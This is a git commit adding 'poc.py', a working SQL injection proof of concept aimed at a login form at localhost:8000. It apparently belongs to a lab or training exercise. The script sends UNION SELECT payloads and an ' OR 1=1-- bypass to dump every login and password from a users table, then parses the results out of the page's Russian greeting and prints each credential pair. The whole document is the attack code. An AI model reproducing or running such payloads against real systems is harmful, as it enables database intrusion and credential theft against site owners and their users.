working poc added

MY BRAIN IS MELTIIINNG
2025-12-16 02:26:01 +10:00
parent 2295061943
commit d990cf5482
1 changed files with 26 additions and 0 deletions
--- a/poc.py
+++ b/poc.py
@@ -0,0 +1,26 @@
+import requests
+import re
+
+BASE_URL = "http://localhost:8000"
+
+login_payload = "' UNION SELECT login FROM users--"
+form_data = {"login": login_payload, "password": "' OR 1=1--"}
+response_logins = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
+
+password_payload = "' UNION SELECT password FROM users--"
+form_data = {"login": password_payload, "password": "' OR 1=1--"}
+response_passwords = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
+
+logins_raw = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_logins.text).group(1)
+passwords_raw = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_passwords.text).group(1)
+
+logins= logins_raw.split("',), ('")
+passwords = passwords_raw.split("',), ('")
+
+
+if logins and passwords:
+    for i, (login, password) in enumerate(zip(logins, passwords)):
+        print(f"  {i+1}. Логин: {login:<20} Пароль: {password}")
+else:
+    print("Не удалось извлечь данные.")
+